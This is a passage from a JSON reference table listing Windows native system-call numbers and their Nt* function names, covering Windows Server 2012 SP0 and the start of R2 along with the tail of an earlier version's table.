"NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAddBootEntry", "103": "NtAddDriverEntry", "104": "NtAdjustGroupsToken", "105": "NtAlertResumeThread", "106": "NtAlertThread", "107": "NtAllocateLocallyUniqueId", "108": "NtAllocateReserveObject", "109": "NtAllocateUserPhysicalPages", "110": "NtAllocateUuids", "111": "NtAlpcAcceptConnectPort", "112": "NtAlpcCancelMessage", "113": "NtAlpcConnectPort", "114": "NtAlpcCreatePort", "115": "NtAlpcCreatePortSection", "116": "NtAlpcCreateResourceReserve", "117": "NtAlpcCreateSectionView", "118": "NtAlpcCreateSecurityContext", "119": "NtAlpcDeletePortSection", "120": "NtAlpcDeleteResourceReserve", "121": "NtAlpcDeleteSectionView", "122": "NtAlpcDeleteSecurityContext", "123": "NtAlpcDisconnectPort", "124": "NtAlpcImpersonateClientOfPort", "125": "NtAlpcOpenSenderProcess", "126": "NtAlpcOpenSenderThread", "127": "NtAlpcQueryInformation", "128": "NtAlpcQueryInformationMessage", "129": "NtAlpcRevokeSecurityContext", "130": "NtAlpcSendWaitReceivePort", "131": "NtAlpcSetInformation", "132": "NtAreMappedFilesTheSame", "133": "NtAssignProcessToJobObject", "134": "NtCancelIoFileEx", "135": "NtCancelSynchronousIoFile", "136": "NtCommitComplete", "137": "NtCommitEnlistment", "138": "NtCommitTransaction", "139": "NtCompactKeys", "140": "NtCompareTokens", "141": "NtCompleteConnectPort", "142": "NtCompressKey", "143": "NtConnectPort", "144": "NtCreateDebugObject", "145": "NtCreateDirectoryObject", "146": "NtCreateEnlistment", "147": "NtCreateEventPair", "148": "NtCreateIoCompletion", "149": "NtCreateJobObject", "150": "NtCreateJobSet", "151": "NtCreateKeyTransacted", "152": "NtCreateKeyedEvent", "153": "NtCreateMailslotFile", "154": "NtCreateMutant", "155": "NtCreateNamedPipeFile", "156": "NtCreatePagingFile", "157": "NtCreatePort", "158": "NtCreatePrivateNamespace", "159": "NtCreateProcess", "160": "NtCreateProfile", "161": "NtCreateProfileEx", "162": "NtCreateResourceManager", "163": "NtCreateSemaphore", "164": "NtCreateSymbolicLinkObject", "165": "NtCreateThreadEx", "166": "NtCreateTimer", "167": "NtCreateToken", "168": "NtCreateTransaction", "169": "NtCreateTransactionManager", "170": "NtCreateUserProcess", "171": "NtCreateWaitablePort", "172": "NtCreateWorkerFactory", "173": "NtDebugActiveProcess", "174": "NtDebugContinue", "175": "NtDeleteAtom", "176": "NtDeleteBootEntry", "177": "NtDeleteDriverEntry", "178": "NtDeleteFile", "179": "NtDeleteKey", "180": "NtDeleteObjectAuditAlarm", "181": "NtDeletePrivateNamespace", "182": "NtDeleteValueKey", "183": "NtDisableLastKnownGood", "184": "NtDisplayString", "185": "NtDrawText", "186": "NtEnableLastKnownGood", "187": "NtEnumerateBootEntries", "188": "NtEnumerateDriverEntries", "189": "NtEnumerateSystemEnvironmentValuesEx", "190": "NtEnumerateTransactionObject", "191": "NtExtendSection", "192": "NtFilterToken", "193": "NtFlushInstallUILanguage", "194": "NtFlushInstructionCache", "195": "NtFlushKey", "196": "NtFlushProcessWriteBuffers", "197": "NtFlushVirtualMemory", "198": "NtFlushWriteBuffer", "199": "NtFreeUserPhysicalPages", "200": "NtFreezeRegistry", "201": "NtFreezeTransactions", "202": "NtGetContextThread", "203": "NtGetCurrentProcessorNumber", "204": "NtGetDevicePowerState", "205": "NtGetMUIRegistryInfo", "206": "NtGetNextProcess", "207": "NtGetNextThread", "208": "NtGetNlsSectionPtr", "209": "NtGetNotificationResourceManager", "210": "NtGetPlugPlayEvent", "211": "NtGetWriteWatch", "212": "NtImpersonateAnonymousToken", "213": "NtImpersonateThread", "214": "NtInitializeNlsFiles", "215": "NtInitializeRegistry", "216": "NtInitiatePowerAction", "217": "NtIsSystemResumeAutomatic", "218": "NtIsUILanguageComitted", "219": "NtListenPort", "220": "NtLoadDriver", "221": "NtLoadKey", "222": "NtLoadKey2", "223": "NtLoadKeyEx", "224": "NtLockFile", "225": "NtLockProductActivationKeys", "226": "NtLockRegistryKey", "227": "NtLockVirtualMemory", "228": "NtMakePermanentObject", "229": "NtMakeTemporaryObject", "230": "NtMapCMFModule", "231": "NtMapUserPhysicalPages", "232": "NtModifyBootEntry", "233": "NtModifyDriverEntry", "234": "NtNotifyChangeDirectoryFile", "235": "NtNotifyChangeKey", "236": "NtNotifyChangeMultipleKeys", "237": "NtNotifyChangeSession", "238": "NtOpenEnlistment", "239": "NtOpenEventPair", "240": "NtOpenIoCompletion", "241": "NtOpenJobObject", "242": "NtOpenKeyEx", "243": "NtOpenKeyTransacted", "244": "NtOpenKeyTransactedEx", "245": "NtOpenKeyedEvent", "246": "NtOpenMutant", "247": "NtOpenObjectAuditAlarm", "248": "NtOpenPrivateNamespace", "249": "NtOpenProcessToken", "250": "NtOpenResourceManager", "251": "NtOpenSemaphore", "252": "NtOpenSession", "253": "NtOpenSymbolicLinkObject", "254": "NtOpenThread", "255": "NtOpenTimer", "256": "NtOpenTransaction", "257": "NtOpenTransactionManager", "258": "NtPlugPlayControl", "259": "NtPrePrepareComplete", "260": "NtPrePrepareEnlistment", "261": "NtPrepareComplete", "262": "NtPrepareEnlistment", "263": "NtPrivilegeCheck", "264": "NtPrivilegeObjectAuditAlarm", "265": "NtPrivilegedServiceAuditAlarm", "266": "NtPropagationComplete", "267": "NtPropagationFailed", "268": "NtPulseEvent", "269": "NtQueryBootEntryOrder", "270": "NtQueryBootOptions", "271": "NtQueryDebugFilterState", "272": "NtQueryDirectoryObject", "273": "NtQueryDriverEntryOrder", "274": "NtQueryEaFile", "275": "NtQueryFullAttributesFile", "276": "NtQueryInformationAtom", "277": "NtQueryInformationEnlistment", "278": "NtQueryInformationJobObject", "279": "NtQueryInformationPort", "280": "NtQueryInformationResourceManager", "281": "NtQueryInformationTransaction", "282": "NtQueryInformationTransactionManager", "283": "NtQueryInformationWorkerFactory", "284": "NtQueryInstallUILanguage", "285": "NtQueryIntervalProfile", "286": "NtQueryIoCompletion", "287": "NtQueryLicenseValue", "288": "NtQueryMultipleValueKey", "289": "NtQueryMutant", "290": "NtQueryOpenSubKeys", "291": "NtQueryOpenSubKeysEx", "292": "NtQueryPortInformationProcess", "293": "NtQueryQuotaInformationFile", "294": "NtQuerySecurityAttributesToken", "295": "NtQuerySecurityObject", "296": "NtQuerySemaphore", "297": "NtQuerySymbolicLinkObject", "298": "NtQuerySystemEnvironmentValue", "299": "NtQuerySystemEnvironmentValueEx", "300": "NtQuerySystemInformationEx", "301": "NtQueryTimerResolution", "302": "NtQueueApcThreadEx", "303": "NtRaiseException", "304": "NtRaiseHardError", "305": "NtReadOnlyEnlistment", "306": "NtRecoverEnlistment", "307": "NtRecoverResourceManager", "308": "NtRecoverTransactionManager", "309": "NtRegisterProtocolAddressInformation", "310": "NtRegisterThreadTerminatePort", "311": "NtReleaseKeyedEvent", "312": "NtReleaseWorkerFactoryWorker", "313": "NtRemoveIoCompletionEx", "314": "NtRemoveProcessDebug", "315": "NtRenameKey", "316": "NtRenameTransactionManager", "317": "NtReplaceKey", "318": "NtReplacePartitionUnit", "319": "NtReplyWaitReplyPort", "320": "NtRequestPort", "321": "NtResetEvent", "322": "NtResetWriteWatch", "323": "NtRestoreKey", "324": "NtResumeProcess", "325": "NtRollbackComplete", "326": "NtRollbackEnlistment", "327": "NtRollbackTransaction", "328": "NtRollforwardTransactionManager", "329": "NtSaveKey", "330": "NtSaveKeyEx", "331": "NtSaveMergedKeys", "332": "NtSecureConnectPort", "333": "NtSerializeBoot", "334": "NtSetBootEntryOrder", "335": "NtSetBootOptions", "336": "NtSetContextThread", "337": "NtSetDebugFilterState", "338": "NtSetDefaultHardErrorPort", "339": "NtSetDefaultLocale", "340": "NtSetDefaultUILanguage", "341": "NtSetDriverEntryOrder", "342": "NtSetEaFile", "343": "NtSetHighEventPair", "344": "NtSetHighWaitLowEventPair", "345": "NtSetInformationDebugObject", "346": "NtSetInformationEnlistment", "347": "NtSetInformationJobObject", "348": "NtSetInformationKey", "349": "NtSetInformationResourceManager", "350": "NtSetInformationToken", "351": "NtSetInformationTransaction", "352": "NtSetInformationTransactionManager", "353": "NtSetInformationWorkerFactory", "354": "NtSetIntervalProfile", "355": "NtSetIoCompletion", "356": "NtSetIoCompletionEx", "357": "NtSetLdtEntries", "358": "NtSetLowEventPair", "359": "NtSetLowWaitHighEventPair", "360": "NtSetQuotaInformationFile", "361": "NtSetSecurityObject", "362": "NtSetSystemEnvironmentValue", "363": "NtSetSystemEnvironmentValueEx", "364": "NtSetSystemInformation", "365": "NtSetSystemPowerState", "366": "NtSetSystemTime", "367": "NtSetThreadExecutionState", "368": "NtSetTimerEx", "369": "NtSetTimerResolution", "370": "NtSetUuidSeed", "371": "NtSetVolumeInformationFile", "372": "NtShutdownSystem", "373": "NtShutdownWorkerFactory", "374": "NtSignalAndWaitForSingleObject", "375": "NtSinglePhaseReject", "376": "NtStartProfile", "377": "NtStopProfile", "378": "NtSuspendProcess", "379": "NtSuspendThread", "380": "NtSystemDebugControl", "381": "NtTerminateJobObject", "382": "NtTestAlert", "383": "NtThawRegistry", "384": "NtThawTransactions", "385": "NtTraceControl", "386": "NtTranslateFilePath", "387": "NtUmsThreadYield", "388": "NtUnloadDriver", "389": "NtUnloadKey", "390": "NtUnloadKey2", "391": "NtUnloadKeyEx", "392": "NtUnlockFile", "393": "NtUnlockVirtualMemory", "394": "NtVdmControl", "395": "NtWaitForDebugEvent", "396": "NtWaitForKeyedEvent", "397": "NtWaitForWorkViaWorkerFactory", "398": "NtWaitHighEventPair", "399": "NtWaitLowEventPair", "400": "NtWorkerFactoryWorkerReady"}}, "Windows Server 2012": {"SP0": {"0": "NtWorkerFactoryWorkerReady", "1": "NtMapUserPhysicalPagesScatter", "2": "NtWaitForSingleObject", "3": "NtCallbackReturn", "4": "NtReadFile", "5": "NtDeviceIoControlFile", "6": "NtWriteFile", "7": "NtRemoveIoCompletion", "8": "NtReleaseSemaphore", "9": "NtReplyWaitReceivePort", "10": "NtReplyPort", "11": "NtSetInformationThread", "12": "NtSetEvent", "13": "NtClose", "14": "NtQueryObject", "15": "NtQueryInformationFile", "16": "NtOpenKey", "17": "NtEnumerateValueKey", "18": "NtFindAtom", "19": "NtQueryDefaultLocale", "20": "NtQueryKey", "21": "NtQueryValueKey", "22": "NtAllocateVirtualMemory", "23": "NtQueryInformationProcess", "24": "NtWaitForMultipleObjects32", "25": "NtWriteFileGather", "26": "NtSetInformationProcess", "27": "NtCreateKey", "28": "NtFreeVirtualMemory", "29": "NtImpersonateClientOfPort", "30": "NtReleaseMutant", "31": "NtQueryInformationToken", "32": "NtRequestWaitReplyPort", "33": "NtQueryVirtualMemory", "34": "NtOpenThreadToken", "35": "NtQueryInformationThread", "36": "NtOpenProcess", "37": "NtSetInformationFile", "38": "NtMapViewOfSection", "39": "NtAccessCheckAndAuditAlarm", "40": "NtUnmapViewOfSection", "41": "NtReplyWaitReceivePortEx", "42": "NtTerminateProcess", "43": "NtSetEventBoostPriority", "44": "NtReadFileScatter", "45": "NtOpenThreadTokenEx", "46": "NtOpenProcessTokenEx", "47": "NtQueryPerformanceCounter", "48": "NtEnumerateKey", "49": "NtOpenFile", "50": "NtDelayExecution", "51": "NtQueryDirectoryFile", "52": "NtQuerySystemInformation", "53": "NtOpenSection", "54": "NtQueryTimer", "55": "NtFsControlFile", "56": "NtWriteVirtualMemory", "57": "NtCloseObjectAuditAlarm", "58": "NtDuplicateObject", "59": "NtQueryAttributesFile", "60": "NtClearEvent", "61": "NtReadVirtualMemory", "62": "NtOpenEvent", "63": "NtAdjustPrivilegesToken", "64": "NtDuplicateToken", "65": "NtContinue", "66": "NtQueryDefaultUILanguage", "67": "NtQueueApcThread", "68": "NtYieldExecution", "69": "NtAddAtom", "70": "NtCreateEvent", "71": "NtQueryVolumeInformationFile", "72": "NtCreateSection", "73": "NtFlushBuffersFile", "74": "NtApphelpCacheControl", "75": "NtCreateProcessEx", "76": "NtCreateThread", "77": "NtIsProcessInJob", "78": "NtProtectVirtualMemory", "79": "NtQuerySection", "80": "NtResumeThread", "81": "NtTerminateThread", "82": "NtReadRequestData", "83": "NtCreateFile", "84": "NtQueryEvent", "85": "NtWriteRequestData", "86": "NtOpenDirectoryObject", "87": "NtAccessCheckByTypeAndAuditAlarm", "88": "NtQuerySystemTime", "89": "NtWaitForMultipleObjects", "90": "NtSetInformationObject", "91": "NtCancelIoFile", "92": "NtTraceEvent", "93": "NtPowerInformation", "94": "NtSetValueKey", "95": "NtCancelTimer", "96": "NtSetTimer", "97": "NtAcceptConnectPort", "98": "NtAccessCheck", "99": "NtAccessCheckByType", "100": "NtAccessCheckByTypeResultList", "101": "NtAccessCheckByTypeResultListAndAuditAlarm", "102": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "103": "NtAddAtomEx", "104": "NtAddBootEntry", "105": "NtAddDriverEntry", "106": "NtAdjustGroupsToken", "107": "NtAdjustTokenClaimsAndDeviceGroups", "108": "NtAlertResumeThread", "109": "NtAlertThread", "110": "NtAlertThreadByThreadId", "111": "NtAllocateLocallyUniqueId", "112": "NtAllocateReserveObject", "113": "NtAllocateUserPhysicalPages", "114": "NtAllocateUuids", "115": "NtAlpcAcceptConnectPort", "116": "NtAlpcCancelMessage", "117": "NtAlpcConnectPort", "118": "NtAlpcConnectPortEx", "119": "NtAlpcCreatePort", "120": "NtAlpcCreatePortSection", "121": "NtAlpcCreateResourceReserve", "122": "NtAlpcCreateSectionView", "123": "NtAlpcCreateSecurityContext", "124": "NtAlpcDeletePortSection", "125": "NtAlpcDeleteResourceReserve", "126": "NtAlpcDeleteSectionView", "127": "NtAlpcDeleteSecurityContext", "128": "NtAlpcDisconnectPort", "129": "NtAlpcImpersonateClientOfPort", "130": "NtAlpcOpenSenderProcess", "131": "NtAlpcOpenSenderThread", "132": "NtAlpcQueryInformation", "133": "NtAlpcQueryInformationMessage", "134": "NtAlpcRevokeSecurityContext", "135": "NtAlpcSendWaitReceivePort", "136": "NtAlpcSetInformation", "137": "NtAreMappedFilesTheSame", "138": "NtAssignProcessToJobObject", "139": "NtAssociateWaitCompletionPacket", "140": "NtCancelIoFileEx", "141": "NtCancelSynchronousIoFile", "142": "NtCancelWaitCompletionPacket", "143": "NtCommitComplete", "144": "NtCommitEnlistment", "145": "NtCommitTransaction", "146": "NtCompactKeys", "147": "NtCompareTokens", "148": "NtCompleteConnectPort", "149": "NtCompressKey", "150": "NtConnectPort", "151": "NtCreateDebugObject", "152": "NtCreateDirectoryObject", "153": "NtCreateDirectoryObjectEx", "154": "NtCreateEnlistment", "155": "NtCreateEventPair", "156": "NtCreateIRTimer", "157": "NtCreateIoCompletion", "158": "NtCreateJobObject", "159": "NtCreateJobSet", "160": "NtCreateKeyTransacted", "161": "NtCreateKeyedEvent", "162": "NtCreateLowBoxToken", "163": "NtCreateMailslotFile", "164": "NtCreateMutant", "165": "NtCreateNamedPipeFile", "166": "NtCreatePagingFile", "167": "NtCreatePort", "168": "NtCreatePrivateNamespace", "169": "NtCreateProcess", "170": "NtCreateProfile", "171": "NtCreateProfileEx", "172": "NtCreateResourceManager", "173": "NtCreateSemaphore", "174": "NtCreateSymbolicLinkObject", "175": "NtCreateThreadEx", "176": "NtCreateTimer", "177": "NtCreateToken", "178": "NtCreateTokenEx", "179": "NtCreateTransaction", "180": "NtCreateTransactionManager", "181": "NtCreateUserProcess", "182": "NtCreateWaitCompletionPacket", "183": "NtCreateWaitablePort", "184": "NtCreateWnfStateName", "185": "NtCreateWorkerFactory", "186": "NtDebugActiveProcess", "187": "NtDebugContinue", "188": "NtDeleteAtom", "189": "NtDeleteBootEntry", "190": "NtDeleteDriverEntry", "191": "NtDeleteFile", "192": "NtDeleteKey", "193": "NtDeleteObjectAuditAlarm", "194": "NtDeletePrivateNamespace", "195": "NtDeleteValueKey", "196": "NtDeleteWnfStateData", "197": "NtDeleteWnfStateName", "198": "NtDisableLastKnownGood", "199": "NtDisplayString", "200": "NtDrawText", "201": "NtEnableLastKnownGood", "202": "NtEnumerateBootEntries", "203": "NtEnumerateDriverEntries", "204": "NtEnumerateSystemEnvironmentValuesEx", "205": "NtEnumerateTransactionObject", "206": "NtExtendSection", "207": "NtFilterBootOption", "208": "NtFilterToken", "209": "NtFilterTokenEx", "210": "NtFlushBuffersFileEx", "211": "NtFlushInstallUILanguage", "212": "NtFlushInstructionCache", "213": "NtFlushKey", "214": "NtFlushProcessWriteBuffers", "215": "NtFlushVirtualMemory", "216": "NtFlushWriteBuffer", "217": "NtFreeUserPhysicalPages", "218": "NtFreezeRegistry", "219": "NtFreezeTransactions", "220": "NtGetCachedSigningLevel", "221": "NtGetContextThread", "222": "NtGetCurrentProcessorNumber", "223": "NtGetDevicePowerState", "224": "NtGetMUIRegistryInfo", "225": "NtGetNextProcess", "226": "NtGetNextThread", "227": "NtGetNlsSectionPtr", "228": "NtGetNotificationResourceManager", "229": "NtGetWriteWatch", "230": "NtImpersonateAnonymousToken", "231": "NtImpersonateThread", "232": "NtInitializeNlsFiles", "233": "NtInitializeRegistry", "234": "NtInitiatePowerAction", "235": "NtIsSystemResumeAutomatic", "236": "NtIsUILanguageComitted", "237": "NtListenPort", "238": "NtLoadDriver", "239": "NtLoadKey", "240": "NtLoadKey2", "241": "NtLoadKeyEx", "242": "NtLockFile", "243": "NtLockProductActivationKeys", "244": "NtLockRegistryKey", "245": "NtLockVirtualMemory", "246": "NtMakePermanentObject", "247": "NtMakeTemporaryObject", "248": "NtMapCMFModule", "249": "NtMapUserPhysicalPages", "250": "NtModifyBootEntry", "251": "NtModifyDriverEntry", "252": "NtNotifyChangeDirectoryFile", "253": "NtNotifyChangeKey", "254": "NtNotifyChangeMultipleKeys", "255": "NtNotifyChangeSession", "256": "NtOpenEnlistment", "257": "NtOpenEventPair", "258": "NtOpenIoCompletion", "259": "NtOpenJobObject", "260": "NtOpenKeyEx", "261": "NtOpenKeyTransacted", "262": "NtOpenKeyTransactedEx", "263": "NtOpenKeyedEvent", "264": "NtOpenMutant", "265": "NtOpenObjectAuditAlarm", "266": "NtOpenPrivateNamespace", "267": "NtOpenProcessToken", "268": "NtOpenResourceManager", "269": "NtOpenSemaphore", "270": "NtOpenSession", "271": "NtOpenSymbolicLinkObject", "272": "NtOpenThread", "273": "NtOpenTimer", "274": "NtOpenTransaction", "275": "NtOpenTransactionManager", "276": "NtPlugPlayControl", "277": "NtPrePrepareComplete", "278": "NtPrePrepareEnlistment", "279": "NtPrepareComplete", "280": "NtPrepareEnlistment", "281": "NtPrivilegeCheck", "282": "NtPrivilegeObjectAuditAlarm", "283": "NtPrivilegedServiceAuditAlarm", "284": "NtPropagationComplete", "285": "NtPropagationFailed", "286": "NtPulseEvent", "287": "NtQueryBootEntryOrder", "288": "NtQueryBootOptions", "289": "NtQueryDebugFilterState", "290": "NtQueryDirectoryObject", "291": "NtQueryDriverEntryOrder", "292": "NtQueryEaFile", "293": "NtQueryFullAttributesFile", "294": "NtQueryInformationAtom", "295": "NtQueryInformationEnlistment", "296": "NtQueryInformationJobObject", "297": "NtQueryInformationPort", "298": "NtQueryInformationResourceManager", "299": "NtQueryInformationTransaction", "300": "NtQueryInformationTransactionManager", "301": "NtQueryInformationWorkerFactory", "302": "NtQueryInstallUILanguage", "303": "NtQueryIntervalProfile", "304": "NtQueryIoCompletion", "305": "NtQueryLicenseValue", "306": "NtQueryMultipleValueKey", "307": "NtQueryMutant", "308": "NtQueryOpenSubKeys", "309": "NtQueryOpenSubKeysEx", "310": "NtQueryPortInformationProcess", "311": "NtQueryQuotaInformationFile", "312": "NtQuerySecurityAttributesToken", "313": "NtQuerySecurityObject", "314": "NtQuerySemaphore", "315": "NtQuerySymbolicLinkObject", "316": "NtQuerySystemEnvironmentValue", "317": "NtQuerySystemEnvironmentValueEx", "318": "NtQuerySystemInformationEx", "319": "NtQueryTimerResolution", "320": "NtQueryWnfStateData", "321": "NtQueryWnfStateNameInformation", "322": "NtQueueApcThreadEx", "323": "NtRaiseException", "324": "NtRaiseHardError", "325": "NtReadOnlyEnlistment", "326": "NtRecoverEnlistment", "327": "NtRecoverResourceManager", "328": "NtRecoverTransactionManager", "329": "NtRegisterProtocolAddressInformation", "330": "NtRegisterThreadTerminatePort", "331": "NtReleaseKeyedEvent", "332": "NtReleaseWorkerFactoryWorker", "333": "NtRemoveIoCompletionEx", "334": "NtRemoveProcessDebug", "335": "NtRenameKey", "336": "NtRenameTransactionManager", "337": "NtReplaceKey", "338": "NtReplacePartitionUnit", "339": "NtReplyWaitReplyPort", "340": "NtRequestPort", "341": "NtResetEvent", "342": "NtResetWriteWatch", "343": "NtRestoreKey", "344": "NtResumeProcess", "345": "NtRollbackComplete", "346": "NtRollbackEnlistment", "347": "NtRollbackTransaction", "348": "NtRollforwardTransactionManager", "349": "NtSaveKey", "350": "NtSaveKeyEx", "351": "NtSaveMergedKeys", "352": "NtSecureConnectPort", "353": "NtSerializeBoot", "354": "NtSetBootEntryOrder", "355": "NtSetBootOptions", "356": "NtSetCachedSigningLevel", "357": "NtSetContextThread", "358": "NtSetDebugFilterState", "359": "NtSetDefaultHardErrorPort", "360": "NtSetDefaultLocale", "361": "NtSetDefaultUILanguage", "362": "NtSetDriverEntryOrder", "363": "NtSetEaFile", "364": "NtSetHighEventPair", "365": "NtSetHighWaitLowEventPair", "366": "NtSetIRTimer", "367": "NtSetInformationDebugObject", "368": "NtSetInformationEnlistment", "369": "NtSetInformationJobObject", "370": "NtSetInformationKey", "371": "NtSetInformationResourceManager", "372": "NtSetInformationToken", "373": "NtSetInformationTransaction", "374": "NtSetInformationTransactionManager", "375": "NtSetInformationVirtualMemory", "376": "NtSetInformationWorkerFactory", "377": "NtSetIntervalProfile", "378": "NtSetIoCompletion", "379": "NtSetIoCompletionEx", "380": "NtSetLdtEntries", "381": "NtSetLowEventPair", "382": "NtSetLowWaitHighEventPair", "383": "NtSetQuotaInformationFile", "384": "NtSetSecurityObject", "385": "NtSetSystemEnvironmentValue", "386": "NtSetSystemEnvironmentValueEx", "387": "NtSetSystemInformation", "388": "NtSetSystemPowerState", "389": "NtSetSystemTime", "390": "NtSetThreadExecutionState", "391": "NtSetTimerEx", "392": "NtSetTimerResolution", "393": "NtSetUuidSeed", "394": "NtSetVolumeInformationFile", "395": "NtShutdownSystem", "396": "NtShutdownWorkerFactory", "397": "NtSignalAndWaitForSingleObject", "398": "NtSinglePhaseReject", "399": "NtStartProfile", "400": "NtStopProfile", "401": "NtSubscribeWnfStateChange", "402": "NtSuspendProcess", "403": "NtSuspendThread", "404": "NtSystemDebugControl", "405": "NtTerminateJobObject", "406": "NtTestAlert", "407": "NtThawRegistry", "408": "NtThawTransactions", "409": "NtTraceControl", "410": "NtTranslateFilePath", "411": "NtUmsThreadYield", "412": "NtUnloadDriver", "413": "NtUnloadKey", "414": "NtUnloadKey2", "415": "NtUnloadKeyEx", "416": "NtUnlockFile", "417": "NtUnlockVirtualMemory", "418": "NtUnmapViewOfSectionEx", "419": "NtUnsubscribeWnfStateChange", "420": "NtUpdateWnfStateData", "421": "NtVdmControl", "422": "NtWaitForAlertByThreadId", "423": "NtWaitForDebugEvent", "424": "NtWaitForKeyedEvent", "425": "NtWaitForWnfNotifications", "426": "NtWaitForWorkViaWorkerFactory", "427": "NtWaitHighEventPair", "428": "NtWaitLowEventPair"}, "R2": {"0": "NtWorkerFactoryWorkerReady", "1": "NtAcceptConnectPort", "2": "NtMapUserPhysicalPagesScatter", "3": "NtWaitForSingleObject", "4": "NtCallbackReturn", "5": "NtReadFile", "6": "NtDeviceIoControlFile", "7": "NtWriteFile", "8": "NtRemoveIoCompletion", "9": "NtReleaseSemaphore", "10": "NtReplyWaitReceivePort", "11": "NtReplyPort", "12": "NtSetInformationThread", "13": "NtSetEvent", "14": "NtClose", "15": "NtQueryObject", "16": "NtQueryInformationFile", "17": "NtOpenKey", "18": "NtEnumerateValueKey", "19": "NtFindAtom", "20": "NtQueryDefaultLocale", "21": "NtQueryKey", "22": "NtQueryValueKey", "23": "NtAllocateVirtualMemory", "24": "NtQueryInformationProcess", "25": "NtWaitForMultipleObjects32", "26": "NtWriteFileGather", "27": "NtSetInformationProcess", "28": "NtCreateKey", "29": "NtFreeVirtualMemory", "30": "NtImpersonateClientOfPort", "31": "NtReleaseMutant", "32": "NtQueryInformationToken", "33": "NtRequestWaitReplyPort", "34": "NtQueryVirtualMemory", "35": "NtOpenThreadToken", "36": "NtQueryInformationThread", "37": "NtOpenProcess", "38": "NtSetInformationFile", "39": "NtMapViewOfSection", "40": "NtAccessCheckAndAuditAlarm", "41": "NtUnmapViewOfSection", "42": "NtReplyWaitReceivePortEx", "43": "NtTerminateProcess", "44": "NtSetEventBoostPriority", "45": "NtReadFileScatter", "46": "NtOpenThreadTokenEx", "47": "NtOpenProcessTokenEx", "48": "NtQueryPerformanceCounter", "49": "NtEnumerateKey", "50": "NtOpenFile", "51": "NtDelayExecution", "52": "NtQueryDirectoryFile", "53": "NtQuerySystemInformation", "54": "NtOpenSection", "55": "NtQueryTimer", "56": "NtFsControlFile", "57": "NtWriteVirtualMemory", "58": "NtCloseObjectAuditAlarm", "59": "NtDuplicateObject", "60": "NtQueryAttributesFile", "61": "NtClearEvent", "62": "NtReadVirtualMemory", "63": "NtOpenEvent", "64": "NtAdjustPrivilegesToken", "65": "NtDuplicateToken", "66": "NtContinue", "67": "NtQueryDefaultUILanguage", "68": "NtQueueApcThread", "69": "NtYieldExecution", "70": "NtAddAtom", "71": "NtCreateEvent", "72": "NtQueryVolumeInformationFile", "73": "NtCreateSection", "74": "NtFlushBuffersFile", "75": "NtApphelpCacheControl", "76": "NtCreateProcessEx", "77": "NtCreateThread", "78": "NtIsProcessInJob", "79": "NtProtectVirtualMemory", "80": "NtQuerySection", "81": "NtResumeThread", "82": "NtTerminateThread", "83": "NtReadRequestData", "84": "NtCreateFile", "85": "NtQueryEvent", "86": "NtWriteRequestData", "87": "NtOpenDirectoryObject", "88": "NtAccessCheckByTypeAndAuditAlarm", "89": "NtQuerySystemTime", "90": "NtWaitForMultipleObjects", "91": "NtSetInformationObject", "92": "NtCancelIoFile", "93": "NtTraceEvent", "94": "NtPowerInformation", "95": "NtSetValueKey", "96": "NtCancelTimer", "97": "NtSetTimer", "98": "NtAccessCheck", "99": "NtAccessCheckByType", "100": "NtAccessCheckByTypeResultList", "101": "NtAccessCheckByTypeResultListAndAuditAlarm", "102": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "103": "NtAddAtomEx", "104": "NtAddBootEntry", "105": "NtAddDriverEntry", "106": "NtAdjustGroupsToken", "107": "NtAdjustTokenClaimsAndDeviceGroups", "108": "NtAlertResumeThread", "109": "NtAlertThread", "110": "NtAlertThreadByThreadId", "111": "NtAllocateLocallyUniqueId", "112": "NtAllocateReserveObject", "113": "NtAllocateUserPhysicalPages", "114": "NtAllocateUuids", "115": "NtAlpcAcceptConnectPort", "116": "NtAlpcCancelMessage", "117": "NtAlpcConnectPort", "118": "NtAlpcConnectPortEx", "119": "NtAlpcCreatePort", "120": "NtAlpcCreatePortSection", "121": "NtAlpcCreateResourceReserve", "122": "NtAlpcCreateSectionView", "123": "NtAlpcCreateSecurityContext", "124": "NtAlpcDeletePortSection", "125": "NtAlpcDeleteResourceReserve", "126": "NtAlpcDeleteSectionView", "127": "NtAlpcDeleteSecurityContext", "128": "NtAlpcDisconnectPort", "129": "NtAlpcImpersonateClientOfPort", "130": "NtAlpcOpenSenderProcess", "131": "NtAlpcOpenSenderThread", "132": "NtAlpcQueryInformation", "133": "NtAlpcQueryInformationMessage", "134": "NtAlpcRevokeSecurityContext", "135": "NtAlpcSendWaitReceivePort", "136": "NtAlpcSetInformation", "137": "NtAreMappedFilesTheSame", "138": "NtAssignProcessToJobObject", "139": "NtAssociateWaitCompletionPacket", "140": "NtCancelIoFileEx", "141": "NtCancelSynchronousIoFile", "142": "NtCancelTimer2", "143": "NtCancelWaitCompletionPacket", "144": "NtCommitComplete", "145": "NtCommitEnlistment", "146": "NtCommitTransaction", "147": "NtCompactKeys", "148": "NtCompareTokens", "149": "NtCompleteConnectPort", "150": "NtCompressKey", "151": "NtConnectPort", "152": "NtCreateDebugObject", "153": "NtCreateDirectoryObject", "154": "NtCreateDirectoryObjectEx", "155": "NtCreateEnlistment", "156": "NtCreateEventPair", "157": "NtCreateIRTimer", "158": "NtCreateIoCompletion", "159": "NtCreateJobObject", "160": 